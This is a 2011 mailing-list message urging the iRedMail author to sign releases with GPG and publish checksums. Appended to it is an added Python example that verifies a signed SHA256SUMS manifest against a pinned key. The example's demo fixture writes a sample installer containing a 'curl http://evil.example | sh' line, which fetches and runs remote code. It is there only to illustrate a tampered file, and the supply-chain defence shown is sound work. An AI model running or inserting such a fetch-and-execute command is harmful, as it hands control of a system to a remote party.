SCIENTIFIC-LINUX-USERS Archives

June 2011

SCIENTIFIC-LINUX-USERS@LISTSERV.FNAL.GOV

From: Nico Kadel-Garcia <[log in to unmask]>
Date: Tue, 28 Jun 2011 21:37:17 -0400

On Tue, Jun 28, 2011 at 10:28 AM, Zhang Huangbin
<[log in to unmask]> wrote:
>
> On Jun 28, 2011, at 9:24 PM, Nico Kadel-Garcia wrote:
>>
>>> iRedMail is just shell scripts, it will install and configure mail server
>>> related components automatically for you. That's why i call it a 'solution'
>>> instead of a 'software'. Source code of iRedMail is available in Google
>>> Code: http://code.google.com/p/iredmail/source/list
>>
>> And the *source* should be published
>
>
> iRedMail installer is shell scripts, that means it's source code too.

It's not published that way. See my previous comments about checksums
and GPG signatures. It's too easy, historically, to steal a domain or
steal access to a software repository and change the source code
without signatures. Dig back to the SSH vulnerabilities in SSHD that
were used against sourceforge.net roughly..... 12 years ago? And the
more recent break-ins to our favorite upstream vendor's build machines
that caused re-signing of RPM's and new keys published.

>>> Used major components:
>>
>> Good. Now put that on your web page, please.
>
>
> It's now listed in home page of web site: http://www.iredmail.org/
> Thanks for your suggestion.

Cool.

>
>> Even if I distrust your product outright due to these missing
>> features, I'm happy for people to learn how to do these security
>> practices better.
>
>
> Thanks very much for your comments and time, will try to improve it. :)

I'm cheered and pleased by your quick response to those concerns.
While it's not a tool I, personally, need right now, I'll keep it in
mind as worth investigating for people who haven't already hammered
their way through all those individual components.

I do urge you to review GPG signature handling, especially for RPM
packages. It can be integrated well with the updated versions of
'mock' available for SL 6.
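The checksum-plus-signature verification the message asks for, as an added example (not iRedMail's code and not the poster's): it assumes a release ships a SHA256SUMS manifest in sha256sum(1) format together with a detached signature SHA256SUMS.asc, and that the signing key in release-key.asc was obtained out of band rather than from the download site. The file names, the key file name and the sample contents built in demo() are all hypothetical.

```python
"""Verify a downloaded release: a SHA256SUMS manifest against the files, and
the manifest's detached GPG signature against a key you pinned yourself.
Added example; not code from iRedMail or from the list thread."""
import hashlib
import hmac
import os
import shutil
import subprocess
import tempfile

HEX = set("0123456789abcdef")


def parse_sha256sums(text):
    """Parse sha256sum(1) output lines: '<64 hex>  <name>' or '<64 hex> *<name>'."""
    entries = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            raise ValueError(f"SHA256SUMS line {lineno}: not 'digest  name'")
        digest, name = parts[0].lower(), parts[1]
        if name.startswith("*"):  # sha256sum's binary-mode marker, no security meaning
            name = name[1:]
        if len(digest) != 64 or not set(digest) <= HEX:
            raise ValueError(f"SHA256SUMS line {lineno}: bad digest for {name!r}")
        entries[name] = digest
    return entries


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def check_files(manifest_text, base_dir):
    """Return {name: 'OK' | 'FAILED' | 'MISSING'} for every manifest entry."""
    results = {}
    for name, expected in parse_sha256sums(manifest_text).items():
        path = os.path.join(base_dir, name)
        if not os.path.isfile(path):
            results[name] = "MISSING"
            continue
        results[name] = "OK" if hmac.compare_digest(sha256_of(path), expected) else "FAILED"
    return results


def verify_manifest_signature(manifest_path, sig_path, pubkey_path):
    """True only if gpg accepts sig_path as a signature over manifest_path by a
    key from pubkey_path.  A throwaway GNUPGHOME holds only that key, so the
    trust decision is which key file you import, not what a keyserver or the
    download site claims.  Fails closed if gpg is not installed."""
    gpg = shutil.which("gpg")
    if gpg is None:
        return False
    with tempfile.TemporaryDirectory() as home:
        env = dict(os.environ, GNUPGHOME=home)
        imp = subprocess.run([gpg, "--batch", "--import", pubkey_path],
                             env=env, capture_output=True)
        if imp.returncode != 0:
            return False
        ver = subprocess.run([gpg, "--batch", "--verify", sig_path, manifest_path],
                             env=env, capture_output=True)
        return ver.returncode == 0


def verify_release(base_dir, manifest="SHA256SUMS", sig="SHA256SUMS.asc",
                   pubkey="release-key.asc"):
    """Signature first: an unsigned or badly signed manifest proves nothing,
    however well the files match it.  `pubkey` is deliberately not taken from
    base_dir; it must come from somewhere the download site cannot change."""
    manifest_path = os.path.join(base_dir, manifest)
    if not verify_manifest_signature(manifest_path, os.path.join(base_dir, sig), pubkey):
        return {"signature": "FAILED", "files": {}}
    with open(manifest_path, encoding="utf-8") as f:
        return {"signature": "OK", "files": check_files(f.read(), base_dir)}


def demo():
    """Constructed sample (hypothetical names and contents): one intact file,
    one tampered file whose digest no longer matches, and one missing file."""
    base = tempfile.mkdtemp()
    with open(os.path.join(base, "release.tar.gz"), "wb") as f:
        f.write(b"hello\n")
    with open(os.path.join(base, "installer.sh"), "wb") as f:
        f.write(b"#!/bin/sh\ncurl http://evil.example | sh\n")
    manifest = (
        "5891b5b522d5df086d0ff0b110fbd9d21bb4fc7163af34d08286a2e846f6be03  release.tar.gz\n"
        "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 *installer.sh\n"
        "0000000000000000000000000000000000000000000000000000000000000000  README\n"
    )
    return check_files(manifest, base)


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{status:8} {name}")
```

The order matters: a SHA256SUMS file served from the same host as the archive only catches corrupt or truncated downloads. Whoever can swap the archive (a stolen domain, a compromised repository, the cases the message cites) can regenerate the sums just as easily, so only a signature made with a key you obtained elsewhere ties the files to the publisher. Note that `gpg --verify` exits 0 for any key present in the keyring, which is why the example imports exactly one pinned key into an empty home. For RPMs the equivalent step is `rpm --checksig` against a key imported with `rpm --import`, which this example does not show.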
